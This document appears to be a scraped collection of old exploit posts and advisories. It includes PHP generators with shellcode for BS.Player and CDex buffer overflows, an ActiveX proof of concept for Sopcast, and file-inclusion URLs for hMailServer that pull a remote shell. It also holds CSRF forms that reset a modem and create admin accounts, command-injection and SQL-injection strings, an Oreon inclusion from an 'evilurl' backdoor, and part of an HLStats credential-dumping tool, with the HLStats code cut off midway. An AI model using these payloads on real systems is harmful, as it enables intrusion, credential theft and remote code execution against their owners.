?php /* Bs.Player = 2.34 Build 980 (.bsl) local buffer overflow 0day exploit (seh) by Nine:Situations:Group::pyrokinesis Overlong hostnames in bsplayer playlist files causes eax and seh handlers to be overwritten. Cannot reliably debug with olly because of code compression, just used faultmon/memdump/msfpescan and I choosed the easy/universal way with seh. There are some pop ret addresses in common among the vulnerable versions... Well it says local but I consider it a remote one because .bsl files are associated to the program Tested and working against: .. v2.32 Build 975 Free v2.34 Build 980 PRO win xp pro sp2 / sp3 win 2k3 sp1 not vulnerable: v2.35 Build 985 PRO V2.36 Build 990 Free/Pro */ $buffer= \x23\x45\x58\x54\x4d\x33\x55\x0d\x0a\x23\x45\x58\x54\x49\x4e\x46. \x3a\x30\x2c\x41\x41\x41\x41\x0d\x0a\x68\x74\x74\x70\x3a\x2f\x2f. \x52\x61\x77\x2d\x48\x69\x67\x68\x2e; $nop1=str_repeat(\x90,384); $eax_again=; $nop2=str_repeat(\x90,12); $eax=; $nop3=str_repeat(\x90,8); $jnk=$nop1.$eax_again.$nop2.$eax.$nop3; $jmp=\xeb\x08\x90\x90; $seh=\xb1\xad\x41\x00; //0x0041adb1 pop pop ret bsplayer.exe $nop4=str_repeat(\x90,100); // win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com $scode= \xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49. \x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x47. \x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x57\x32\x42\x42\x42\x32. \x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x59\x79\x4b\x4c\x69. \x78\x37\x34\x67\x70\x45\x50\x75\x50\x6c\x4b\x61\x55\x45\x6c\x6e. \x6b\x71\x6c\x73\x35\x62\x58\x66\x61\x6a\x4f\x4c\x4b\x42\x6f\x56. \x78\x4c\x4b\x71\x4f\x77\x50\x57\x71\x6a\x4b\x72\x69\x6e\x6b\x75. \x64\x4e\x6b\x75\x51\x68\x6e\x30\x31\x59\x50\x4d\x49\x4c\x6c\x4f. \x74\x69\x50\x31\x64\x36\x67\x4f\x31\x4a\x6a\x44\x4d\x75\x51\x68. \x42\x38\x6b\x5a\x54\x35\x6b\x62\x74\x75\x74\x37\x74\x70\x75\x68. \x65\x4c\x4b\x51\x4f\x35\x74\x73\x31\x4a\x4b\x50\x66\x6c\x4b\x44. \x4c\x50\x4b\x6c\x4b\x41\x4f\x77\x6c\x34\x41\x7a\x4b\x6c\x4b\x67. \x6c\x6e\x6b\x37\x71\x6a\x4b\x4d\x59\x33\x6c\x71\x34\x54\x44\x39. \x53\x55\x61\x6f\x30\x41\x74\x6c\x4b\x37\x30\x70\x30\x6e\x65\x4b. \x70\x61\x68\x66\x6c\x6e\x6b\x61\x50\x36\x6c\x6e\x6b\x74\x30\x65. \x4c\x6e\x4d\x6c\x4b\x71\x78\x64\x48\x68\x6b\x76\x69\x6c\x4b\x4f. \x70\x48\x30\x75\x50\x75\x50\x55\x50\x4e\x6b\x63\x58\x67\x4c\x31. \x4f\x56\x51\x4a\x56\x53\x50\x41\x46\x4f\x79\x4b\x48\x4b\x33\x39. \x50\x61\x6b\x32\x70\x53\x58\x6c\x30\x4c\x4a\x65\x54\x53\x6f\x63. \x58\x7a\x38\x49\x6e\x4e\x6a\x54\x4e\x70\x57\x69\x6f\x58\x67\x62. \x43\x72\x41\x70\x6c\x70\x63\x43\x30\x47; $buffer.=$jnk.$jmp.$seh.$nop4.$scode; $buffer.= x56\x37\x2e\x46\x4d\x2f\x6c\x69\x73\x74\x65\x6e\x2e\x70. \x6c\x73\x0d\x0a\x00; $fp=fopen(evil.bsl,w+); if (!$fp) {die(cannot create evil.bsl!);} @fputs($fp,$buffer); @fclose($fp); ? original url: http://retrogod.altervista.org/9sg_bsplayer_seh.html
CDex v1.70b2 (.ogg) local buffer overflow exploit poc
?PHP /* CDex v1.70b2 (.ogg) local buffer overflow exploit poc (win xp sp3) by Nine:Situations:Group::Pyrokinesis software site: http://cdexos.sourceforge.net/ our site: http://retrogod.altervista.org/ A very reliable buffer overflow exists in the way cdex process Ogg Vorbis Info headers. usage: c:\php\php 9sg_cdex_local.php evil.ogg is created, now navigate: Main Menu- Tools - Media file Player - Select files - Browse to a folder - - Open - Play evil.ogg */ $_frgmnt1 = OggS. //for what I understood ... beginning \x00. //stream_structure_version \x02. //header_type_flag \x00\x00\x00\x00\x00\x00\x00\x00. //granular_position \x66\x07\x00\x00. //bitstream_serial_number \x00\x00\x00\x00. //page_sequence_number \x92\xa8\x3b\xd9. //CRC_checksum \x01. //number_page_segments \x1e. //segments_table \x01. vorbis. \x00\x00\x00\x00\x02\x44\xac\x00\x00\x00\x00\x00\x00. \x00\x71\x02\x00\x00\x00\x00\x00\xb8\x01; $_frgmnt2 = OggS. \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x66\x07. \x00\x00\x01\x00\x00\x00. \x00\x00\x00\x00. //set crc to 0, after calculate the real crc \x51\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff. \xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff. \xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff. \xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff. \xff\xff\xff\xff\xff\x93\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff. \xff\xff\xff\xff\xff\xff\x03vorbis\x1d\x00\x00. \x00Xiph.Org\x20libVor. bis\x20I\x2020040629\x03\x00. \x00\x00\x07\x20\x00\x00. ARTIST=; $payload_len=8192; //msg box shellcode saying hey ... //replace with your own, the script recalculates the CRC checksum $scode = \x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a. \xbb\x7b\x1d\x80\x7c. //LoadLibraryA at 0x7c801d7b in kernel32.dll xpsp3 \x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50. \xbb\x30\xae\x80\x7c. //GetProcAddress at 0x7c80ae30 in kernel32.dll \xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x03\x31\xd2\x52\x51. \x51\x52\xff\xd0\x31\xd2\x50. \xb8\xfa\xca\x81\x7c. //ExitProcess at 0x7c81cafa in kernel32.dll \xff\xd0\xe8\xc4\xff. \xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff. \xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff. \xff\x48\x65\x79\x4e; $_boom=str_repeat(\x90,2048 - strlen($scode)).$scode. \x67\x86\x86\x7c. //eip - 0x7C868667 call esp kernel32.dll \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90. \x83\xec\x7f. // sub esp,07f \x83\xec\x7f. //.. \x83\xec\x7f. //.. \x83\xec\x7f. //.. \x83\xec\x7f. //.. \xff\xd4. //call esp \x90\x90\x90. \x00\x00\x00\x00;//if replaced with non-zero chars, overwrites seh ... do not touch $_frgmnt2.=$_boom.\x90\x90\x90\x90\x90\x90\x90\x90.str_repeat(\x90,$payload_len - strlen($_boom) - 8); $_frgmnt2.=\x0a\x20\x00\x00. PERFORMER=; $_frgmnt2.=str_repeat(\x90,$payload_len); $_frgmnt2.=\x09\x00\x00\x00. DATE=2009. \x01\x05. vorbis. \x29\x42\x43\x56\x01\x00\x08\x00\x00\x00\x31\x4c\x20\xc5\x80\xd0. \x90\x55\x00\x00\x10\x00\x00. \x60\x24\x29\x0e\x93\x66\x49\x29\xa5. \x94\xa1\x28\x79\x98\x94\x48\x49\x29\xa5\x94\xc5\x30\x89\x98\x94. \x89\xc5\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x20. \x34\x64\x15\x00\x00\x04\x00\x80\x28\x09\x8e\xa3\xe6\x49\x6a\xce. \x39\x67\x18\x27\x8e\x72\xa0\x39\x69\x4e\x38\xa7\x20\x07\x8a\x51. \xe0\x39\x09\xc2\xf5\x26\x63\x6e\xa6\xb4\xa6\x6b\x6e\xce\x29\x25. \x08\x0d\x59\x05\x00\x00\x02\x00\x40\x48\x21\x85\x14\x52\x48\x21. \x85\x14\x62\x88\x21\x86\x18\x62\x88\x21\x87\x1c\x72\xc8\x21\xa7. \x9c\x72\x0a\x2a\xa8\xa0\x82\x0a\x32\xc8\x20\x83\x4c\x32\xe9\xa4. \x93\x4e\x3a\xe9\xa8\xa3\x8e\x3a\xea\x28\xb4\xd0\x42\x0b\x2d\xb4. \xd2\x4a\x4c\x31\xd5\x56\x63\xae\xbd\x06\x5d\x7c\x73\xce\x39\xe7. \x9c\x73\xce\x39\xe7\x9c\x73\xce\x09\x42\x43\x56\x01\x00\x20\x00. \x00\x04\x42\x06\x19\x64\x10\x42\x08\x21\x85\x14\x52\x88\x29\xa6. \x98\x72\x0a\x32\xc8\x80\xd0\x90\x55\x00\x00\x20\x00\x80\x00\x00. \x00\x00\x47\x91\x14\x49\xb1\x14\xcb\xb1\x1c\xcd\xd1\x24\x4f\xf2. \x2c\x51\x13\x35\xd1\x33\x45\x53\x54\x4d\x55\x55\x55\x55\x75\x5d. \x57\x76\x65\xd7\x76\x75\xd7\x76\x7d\x59\x98\x85\x5b\xb8\x7d\x59. \xb8\x85\x5b\xd8\x85\x5d\xf7\x85\x61\x18\x86\x61\x18\x86\x61\x18. \x86\x61\xf8\x7d\xdf\xf7\x7d\xdf\xf7\x7d\x20\x34\x64\x15\x00\x20. \x01\x00\xa0\x23\x39\x96\xe3\x29\xa2\x22\x1a\xa2\xe2\x39\xa2\x03. \x84\x86\xac\x02\x00\x64\x00\x00\x04\x00\x20\x09\x92\x22\x29\x92. \xa3\x49\xa6\x66\x6a\xae\x69\x9b\xb6\x68\xab\xb6\x6d\xcb\xb2\x2c. \xcb\xb2\x0c\x84\x86\xac\x02\x00\x00\x01\x00\x04\x00\x00\x00\x00. \x00\xa0\x69\x9a\xa6\x69\x9a\xa6\x69\x9a\xa6\x69\x9a\xa6\x69\x9a. \xa6\x69\x9a\xa6\x69\x9a\x66\x59\x96\x65\x59\x96\x65\x59\x96\x65.
Sopcast SopCore Control (sopocx.ocx 3.0.3.501) SetExternalPlayer() user assisted remote code execution poc
!-- Sopcast SopCore Control (sopocx.ocx 3.0.3.501) SetExternalPlayer() user assisted remote code execution poc by Nine:Situations:Group::surfista (IE7/8) our site: http://retrogod.altervista.org/ software site: http://www.sopcast.org/ Through the SetExternalPlayer() method and the ExternalPlayer property is possible to associate an arbitrary executable to the external player button (for clearness see http://www.sopcast.com/docs/ where the player control buttons are showed) which opens Windows Media Player by default. When the user click this button, the executable is launched without prompts Also this value is stored in config.xml, inside the sopcast local folder for further use, ex. with the sopcast client application Note: this control is safe for scripting and safe for initialization -- HTML HEAD script language=Javascript type=text/JavaScript window.onload=function() { SopPlayer.InitPlayer(); //SopPlayer.SetExternalPlayer(192.168.0.1\\c$\\PATH\\TO\\MALICIOUS_PROGRAM.EXE); SopPlayer.SetExternalPlayer(c:\\WINDOWS\\system32\\calc.exe); SopPlayer.SetSopAddress(sop://broker.sopcast.com:3912/6002); //A LIVE CHANNEL ... SopPlayer.SetChannelName(CCTV5); SopPlayer.Play(); } /script /HEAD BODY OBJECT ID=SopPlayer name=SopPlayer CLASSID=clsid:8FEFF364-6A5F-4966-A917-A3AC28411659 HEIGHT=375 WIDTH=375 /OBJECT /BODY /HTML original url: http://retrogod.altervista.org/9sg_sopcastia.html
Re: Re: Google Chrome Browser (ChromeHTML://) remote parameter injection POC
Attack vector is Internet Explorer 7/8b against a system with a coexistent google chrome installation. It works exactly like this: http://www.milw0rm.com/exploits/7181
hMAilServer 4.4.2 (PHPWebAdmin) local remote file inclusion
hMAilServer 4.4.2 (PHPWebAdmin) local remote file inclusion poc by Nine:Situations:Group::strawdog our site: http://retrogod.altervista.org software site: http://www.hmailserver.com/ description: http://en.wikipedia.org/wiki/HMailServer google dork: PHPWebAdmin for hMailServer intitle:PHPWebAdmin -site:hmailserver.com -dork poc: regardless of register_globals magic_quotes_gpc: http://hostname/path_to_webadmin/index.php?page=background/../../../../../../../../boot.ini%00 http://hostname/path_to_webadmin/index.php?page=background/../../Bin/hMailServer.INI%00 http://hostname/path_to_webadmin/index.php?page=background/../../MySQL/my.ini%00 http://hostname/path_to_webadmin/index.php?page=background/../../../../../../../.. /../Program+Files/hmailserver/Bin/hmailserver.ini%00 with register_globals = on: (prepare a functions.php folder on somehost.com with an index.html with your shell inside on a php enabled server, otherwise a functions.php shell on a php disabled one) http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=http://www.somehost.com/cmd=dir with register_globals = on magic_quotes_gpc = off : http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=c:\boot.ini%00 http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=http://www.somehost.com/shell.txt%00cmd=dir http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=c:\Program+Files\hMailServer\Bin\hMailServer.INI%00 http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=../Bin/hMailServer.INI%00 Bin folder can be found in a different location, disclose the path by simply calling: http://hostname/path_to_webadmin/initialize.php interesting file: hMailServer.INI - contains two interesting fields: - the Administrator password crypted with md5, - by having knowledge of that you can calculate the MySQL root password, specified in the password field. You can do this by using the /Addons/Utilities/DecryptBlowfish.vbs script (*) vulnerable code, index.php: ?php error_reporting(E_ALL); if (!file_exists(config.php)) { echo Please rename config-dist.php to config.php. The file is found in the PHPWebAdmin root folder.; die; } require_once(config.php); require_once(initialize.php); set_error_handler(ErrorHandler); if (is_php5()) set_exception_handler(ExceptionHandler); $page = hmailGetVar(page); if ($page == ) $page = frontpage; $isbackground = (substr($page, 0,10) == background); if ($isbackground) $page = $page.php; else $page = hm_$page.php; // Check that the page really exists. $page = stripslashes($page); if (!file_exists($page)) hmailHackingAttemp(); // If it's a background page, run here. if ($isbackground) { include $page; //-- !!! // Page is run, die now. die; } .. for clearness, here it is hmailGetVar() function in /include/functions.php: .. function hmailGetVar($p_varname, $p_defaultvalue = null) { $retval = $p_defaultvalue; if(isset($_GET[$p_varname])) { $retval = $_GET[$p_varname]; } else if (isset($_POST[$p_varname])) { $retval = $_POST[$p_varname]; } else if (isset($_REQUEST[$p_varname])) { $retval = $_REQUEST[$p_varname]; } if (get_magic_quotes_gpc()) $retval = stripslashes($retval); return $retval; } .. so the page argument can be passed by $_GET[], $_POST[] or $_COOKIE[] arrays. Note the stripslashes(), which disable magic_quotes_gpc on every argument passed. (**) initialize.php: .. $hmail_config['rootpath'] = str_replace(\\,/,$hmail_config['rootpath']); $hmail_config['includepath']= str_replace(\\,/,$hmail_config['includepath']); $hmail_config['temppath'] = str_replace(\\,/,$hmail_config['temppath']); require_once($hmail_config['includepath'] . functions.php); ..
Sea-Surfing on the Motorola Surfboard
More information about this flaw can be found here: http://www.rooksecurity.com/blog/?p=4 Motorola Surfboard Cable Modems suffer from two Denial of Service attacks by means of Cross Site Request Forgery. The latest version of The Motorola Surfboard is affected at the time of the writing. Restarts the modem: html form id=1 method=post action=http://192.168.100.1/configdata.html input name=BUTTON_INPUT value=Restart+Cable+Modem /form html script document.getElementById(1).submit(); /script This CSRF will disconnect the user from the internet for longer. The process to get back online from a factory default condition could take from 5 to 30 minutes. html form id=2 method=post action=http://192.168.100.1/configdata.html input name=BUTTON_INPUT value=Reset+All+Defaults /form html script document.getElementById(2).submit(); /script Peace
BitTorrent Clients and CSRF
The following are proof of concept exploits against three bittorrent clients. uTorrent' WebUI, Azurues's HTML WebUI, and TorrentFlux. More information: http://www.rooksecurity.com/blog/?p=10 TorrentFlux v2.3(Latest) http://sourceforge.net/projects/torrentflux/ If you force TorrentFlux to download a torrent that contains a file backdoor.php you will be able to execute it by browsing here: http://localhost/torrentflux_2.3/html/downloads/USER_NAME/ You do not have to know a password to access this folder, but you will have to know the username. html form id='file_attack' method=post action=http://localhost/torrentflux_2.3/html/index.php; input type=hidden name=url_upload value=http://localhost/backdoor.php.torrent; input type=submit value='file attack' /from html script document.getElementById('file_attack').submit(); /script html Add an admistrative account: form id=create_admin method=post action=http://localhost/torrentflux_2.3/html/admin.php?op=addUser input type=hidden name=newUser value=sadmin input type=hidden name=pass1#8243; value=password input type=hidden name=pass2#8243; value=password input type=hidden name=userType value=1 input type=submit value=create admin /form /html script document.getElementById(create_admin).submit(); /script uTorrents WebUI is also affected: http://forum.utorrent.com/viewtopic.php?id=14565 force file download: http://127.0.0.1:8080/gui/?action=add-urls=http://localhost/backdoor.torrent utorrent change administrative login information: http://127.0.0.1:8080/gui/?action=setsettings=webui.usernamev=badmin http://127.0.0.1:8080/gui/?action=setsettings=webui.passwordv=badmin http://127.0.0.1:8080/gui/?action=setsettings=webui.portv=4096 After the username or password have been changed then the browser must re-authenticate. http://127.0.0.1:8080/gui/?action=setsettings=webui.restrictv=127.0.0.1/24,10.1.1.1 So is Azuruess HTML WebUI: Force file download: http://127.0.0.1:6886/index.tmpl?d=uupurl=http://localhost/backdoor.torrent
etomite xss
Homepage: http://www.etomite.com/ Tested Version: 0.6.1 Final Exploit:http://localhost/etomite0614/index.php/%22%3E%3Cscript%3Ealert(%22test%22)%3C/script%3E/fill This is a flaw because $_SERVER['PHP_INFO'] is being trusted. $_SERVER['PHP_INFO'] will contain this value when the exploit url is used: /index.php/scriptalert(test)/script/fill /fill is removed. Trust no one. Michael Brooks
Re: Wordpress - Broken Access Control
Hi all, Apparently there is some disagreement about this issue. I am providing more information to build a greater understanding about what is happening. This problem is entirely contained within the query.php file. At the comment header of query.php it says: The Big Query. Yes indeed this file produces a large query. This file is very disorganized and it was difficult to go though with a fine tooth comb, but I did and i found a flaw because of it. I was looking for SQL Injection, but broken access control will get me a CVE number. Perhaps this URL provides more information: http://localhost/wordpress/index.php/'wp-admin/ I urge everyone to make this get request and to print the $_SERVER['REQUEST_URI'] and $_SERVER['PHP_SELF'] variables. You will see that wp-admin/ is at the end of these variables. I should have provided the exact point in which the flawed query is being built. I thought that my PoC was enough, my bad. if ( is_admin() ) $where .= OR post_status = 'future' OR post_status = 'draft' OR post_status = 'pending'; This url: htttp://localhost/wordpress/index.php/'wp-admin/ will cause the is_admin() function to return TRUE. function is_admin () { global $wp_query; return ($wp_query-is_admin || (stripos($_SERVER['REQUEST_URI'], 'wp-admin/') !== false)); } In the future you shouldn't attack someone who is trying to help. This is a complex and irregular issue so I totally understand why it was difficult to see. In the future you shouldn't dismiss something you do not understand, instead i urge you to ask questions and learn more. Peace
Phpay - Local File Inclusion
By Michael Brooks Vulnerability Type:Local File Inclusion Software: Phpay Homepage:http://sourceforge.net/projects/phpay/ Version Affected:2.02.1 Phpay has been affected by multiple local file include flaws, as a result this patch was written: $config = ereg_replace(:,, $config); $config = trim(ereg_replace(../,, $config)); $config = trim(ereg_replace(/,, $config)); if (($config==)|| (!eregi(.inc.php,$config))){$config=config.inc.php; echo !--$config--\n;} if (!file_exists($config)) { echo panic: $config doesn't exist!! Did you backup it after installation? ...; exit;} require(./$config); To bypass this patch backslashes can be used instead of forward slashes on windows systems. Also .inc.php must exists *somewhere* in the string. Local File Include for windows only: http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\\..\\admin\\.htaccess or if magic_quotes_gpc is turned on: http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.htaccess Remote code execution is accessible in the ./admin/ folder. The admin folder *should* be protected by a .htaccess file similar to osCommerce2. Vulnerable configuration: A there is a call to extract($_GET) so the exploit will work regardless of register_globals. Using Linux is a very good fix for this issue. Merry Christmas
Anon Proxy Server - Remote Code Execution
By Michael Brooks Vulnerability type: Multiple Remote System commands execution. Software: Anon Proxy Server Home page:http://sourceforge.net/projects/anonproxyserver/ Affects version: 0.100 Example exploit: http://127.0.0.1/anon_proxy_server_0.100/diagdns.php?host=google.com%5C%27+%26%26+cat+%2Fetc%2Fpasswd+%23 A virtually identical flaw exists in diagconnect.php however it takes longer to execute. Anon Proxy Server forces magic_quotes_gpc=on, However magic_quotes_gpc does not protect the system() function from taint. For protection you should use the escapeshellarg() function. Removing diagdns.php and diagconnect.php is the best temporary solution. Also magic_quotes_gpc is being removed in php6, so Anon Proxy Server will have to revamp there security. Peace
Oreon/Centreon - Multiple Remote File Inclusion
By Michael Brooks Vulnerability Type: Multiple Remote File Inclusion. Software: Oreon and Centreon Homepage:http://www.oreon-project.org/ or http://www.centreon.com/ Versions: 1.4(Oreon) and 1.4.1(Centreon) The vulnerable file is: ./oreon-1.4/www/include/monitoring/engine/MakeXML.php Another,virtually identical RFI: ./oreon-1.4/www/include/monitoring/engine/MakeXML4statusCounter.php The attack: http://127.0.0.1/include/monitoring/engine/MakeXML.php?fileOreonConf=http://evilurl/backdoor.txt? or http://127.0.0.1/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://evilurl/backdoor.txt? file MakeXML.php line 42 43: include_once($oreonPath . www/oreon.conf.php); include_once($oreonPath . www/include/common/common-Func-ACL.php); Register_globals isn't needed for the taint: file MakeXML.php line 28: if (isset($_GET[fileOreonConf])) $oreonPath = $_GET[fileOreonConf]; However magic_quotes_gpc is require for LFI because you need a null byte. Peace
PHP RPG - Sql Injection and Session Information Disclosure.
By Michael Brooks Vulneralbity: Sql Injection and Session Information Disclosure. Homepage:http://sourceforge.net/projects/phprpg/ Verison affected 0.8.0 There are two flaws that affect this applcation. A nearly vinnella login bypass issues affects phprpg. If magic_qutoes_gpc=off then this will login an attacker as the administrator using this: username:1'or 1=1 limit 1/* password:1 Keep in mind that magic_quotes_gpc is being removed in php6! The second flaw allows an attacker to steal any session registered by phprpg by navigating to this directory: http://localhost/phpRPG-0.8.0/tmp/ This is because phprpg has manually changed the directory using session_save_path() which is called in init.php on line 49. Peace
Wordpress - Broken Access Control
By Michael Brooks Vulnerability:Broken Access Control Homepage:http://wordpress.org/download Software: Wordpress Version affected:2.3.1 (Latest at the time of writing) The impact of the flaw is that an attacker can read posts while they are still drafts. This is an ability that only the administrator should have. Imagine a stranger being able to read the news before it is published. Or perhaps a spam-blog harvesting posts before they are published. This flaw is because Wordpress is trusting the $_SERVER['REQUEST_URI'] global variable. Manipulation of $_SERVER['REQUEST_URI']has led to many xss flaws. Although an attacher shouldn't be able to control all $_SERVER variables, none of them should be trusted. exploit: htttp://localhost/wordpress/'wp-admin/ This will cause both $_SERVER['REQUEST_URI'] and $_SERVER['PHP_SELF'] to contain the value: htttp://localhost/wordpress/'wp-admin/ Vulnerable function: line 34, in ./wp-includes/query.php. function is_admin () { global $wp_query; return ($wp_query-is_admin || (stripos($_SERVER['REQUEST_URI'], 'wp-admin/') !== false)); } The same flaw is duplicted in again on line 645 of the same file. This url: htttp://localhost/wordpress/'wp-admin/ will cause the is_admin() function to return true. This flaw works regardless of register_globas or magic_quotes_gpc. The attack fails when search engine friendly urls are turned on in wordpress, however this option is turned off by default. Turning search engine friendly urls on is a workaround until a patch is created. Peace
IceBB 1.0rc6 = Remote SQL Injection
[|Description:|] A security breach has been discoverd in IceBB 1.0-rc6. This breach is caused by a bad filtering of the X-Forwarded-For variable: ./includes/functions.php, line 73 $ip = empty($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['REMOTE_ADDR'] : $_SERVER['HTTP_X_FORWARDED_FOR']; $ip = $this-clean_key($ip); $input['ICEBB_USER_IP'] = $ip; ./icebb.php, line 169 $icebb-client_ip = $input['ICEBB_USER_IP']; ./admin/index.php, line 112 $icebb-adsess = $db-fetch_result(SELECT adsess.*,u.id as userid,u.username,u.temp_ban,g.g_view_board FROM icebb_adsess AS adsess LEFT JOIN icebb_users AS u ON u.username=adsess.user LEFT JOIN icebb_groups AS g ON u.user_group=g.gid WHERE adsess.asid='{$icebb-input['s']}' AND adsess.ip='{$icebb-client_ip}' LIMIT 1); A hacker could exploit this security breach in order to alter a SQL request. [|Exploit:|] http://www.aeroxteam.fr/exploit-IceBB-1.0rc6.php [|Solution:|] No one. Think about update your forum core when a patch will be available on the official website. [|Credits:|] Gu1ll4um3r0m41n (aeroxteam --[at]-- gmail --[dot]-- com) for AeroX (AeroXteam.fr) [|Greetz:|] Math², KERNEL_ERROR, NeoMorphS, Snake91, Goundy, Alkino (...) And everybody from #aerox
Re: IceBB 1.0rc6 = Remote SQL Injection
correction [|Exploit:|] http://www.aeroxteam.fr/exploit-IceBB-1.0rc6.txt
Re: MkPortal All Guests are Admin Exploit
Fixed In Mkportal version 1.1.1
MetaForum = 0.513 Beta - Remote file upload Vulnerability
[|Description:|] A security bug has been discovered in MetaForum 0.513 Beta. This bug can be used by an attacker to upload a malicious php file on the server. During the upload, the MIME type of the file is the only verified parameter. The extention isn't. This enables a attacker to fake the MIME type of a php file so that it is considered as an image. [|Exploit:|] http://www.aeroxteam.fr/exploit-MetaForum-0.513b.txt [|Solution:|] Replace line 110 in the file usercp.php by: if (($_FILES['imagefile']['type'] == image/jpeg || $_FILES['imagefile']['type'] == image/pjpeg || $_FILES['imagefile']['type'] == image/png || $_FILES['imagefile']['type'] == image/gif) in_array(strtolower(substr(strrchr($_FILES['imagefile']['name'], '.'),1)), array('gif', 'jpg', 'jpeg', 'png'))) [|Credits:|] Gu1ll4um3r0m41n (aeroxteam --[at]-- gmail --[dot]-- com) for AeroX NeoAlpha (AeroXteam.fr -- Neoalpha.fr) [|Gr33tz:|] Math², Syntax ERROR, Barma, NeoMorphS, Snake91, Spamm, Kad, Nitr0, Jethro And everybody from #aerox
Re: Digital Armaments Security Advisory 20.01.2007: Grsecurity Kernel PaX Vulnerability
Could you please provide more details about this vulnerability ? Especially which versions are affected :-) Kind regards, Marek Kroemeke
HLStats Remote SQL Injection Exploit
Hlstats is more than 5 years old. HLstats has been downloaded more than 270,000 from http://sf.net. Nothing more than absolutely benign XSS has been reported for this application, until NOW. Merry Christmass, --Michael Brooks Homepage: http://sourceforge.net/projects/hlstats/ -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 brb ?php /* Live Exploit Code SQL Inection + Path Disclosure Affects HLStats HLStats =1.34 and Hlstats = 1.20 works with magic_quotes_gpc=On by Michael Brooks */ print titleHLStats SQL Injection Exploit/title body bgcolor='#009900' font color='#FF' b/bbrbr centerb br Welcome To HLstats Exploit code.brbr /b/center br SQL Inection + Path Disclosurebr Affects Hlstats = 1.20 to HLStats =1.34(current)br Tested on Linux and Windowsbr works with magic_quotes_gpc=On!br HLStats has gone though 5 years with no exploits so this is a Birthday Present!br Merry Christmass!br By Michael Brooksbr br b/bbrbr ; print form action='.$_SERVER['PHP_SELF'].' method='post' bTarget:/bbr input type='text' name='target' size=32br (hint: where the login form is. example: http://domain.com/path/hlstats.php )br brbProxy:/b(ip:port or name:[EMAIL PROTECTED]:port)br input type='text' name='proxy' size=32br (example: 127.0.0.1:8118 Use a href='http://tor.eff.org'Tor/a+a href='http://www.privoxy.org/'Privoxy/a. )br brbr If nothing is changed below this line then the exploit will attempt to get the database login information in plain text. b/bbrbr H1ATTACKS:/H1 br bDatabase Selects:/bbr br OBTIAN HLStats logins:br input type='submit' name='button' value='HLStats_Logins'(Passwords are stored as MD5 hashs, use: a href='http://www.milw0rm.com/cracker/insert.php'Milw0rm's MD5 Cracker/a)br OBTIAN mysql.user logins:br input type='submit' name='button' value='Mysql_Logins'br br br bFile IO:/bbrbr bPath Disclosure/bbr input type='submit' name='button' value='Path'br br bPlain Text Database Login Information/bbr input type='submit' name='button' value='Read_Login' (This will attempt to read the configuration file for hlstats and dump the PLAIN TEXT database login information.)br br bRead Other File/bbr input type='submit' name='button' value='Read_File' input type='text' name='read_file' size=50 brexample: /etc/passwdbr OR for windows based systems: C:WINDOWSrepairsambr brbattempt payload:/b(WARNING, NO PROXY IS USED FOR UPLOADING PAYLOAD)br input type='submit' name='button' value='Upload' lt?php input type='text' name='payload' size=50?gt br example: system('netstat'); br /form brb/bbr ; //generic http class class http{ var $proxy_ip='', $proxy_port='', $proxy_name='', $proxy_pass=''; function http_gpc_send($loc ,$cookie=, $postdata = ) { //overload function polymorphism between gets and posts $url=parse_url($loc); if(!isset($url['port'])){ $url['port']=80; } //$ua=$_SERVER['HTTP_USER_AGENT']; $ua='GPC/.01'; if($this-proxy_ip!=''$this-proxy_port!=''){ $fp = pfsockopen( $this-proxy_ip, $this-proxy_port, $errno, $errstr, 120 ); $url['path']=$url['host'].':'.$url['port'].$url['path']; }else{ $fp = fsockopen( $url['host'], $url['port'], $errno, $errstr, 120 ); } if( !$fp ) { print $errstr ($errno)br\nn; } else { if( $postdata=='' ) { fputs( $fp, GET .$url['path'].?.$url['query']. HTTP/1.1\r\n ); } else { fputs( $fp, POST .$url['path'].?.$url['query']. HTTP/1.1\r\n ); } if($this-proxy_name!=''$this-proxy_pass!=''){ fputs($fp, Proxy-Authorization: Basic .base64_encode($this-proxy_name.:.$this-proxy_pass).\r\n\r\n); } fputs($fp, Host:
AROUNDMe 0.6.9 remonte file inclusion
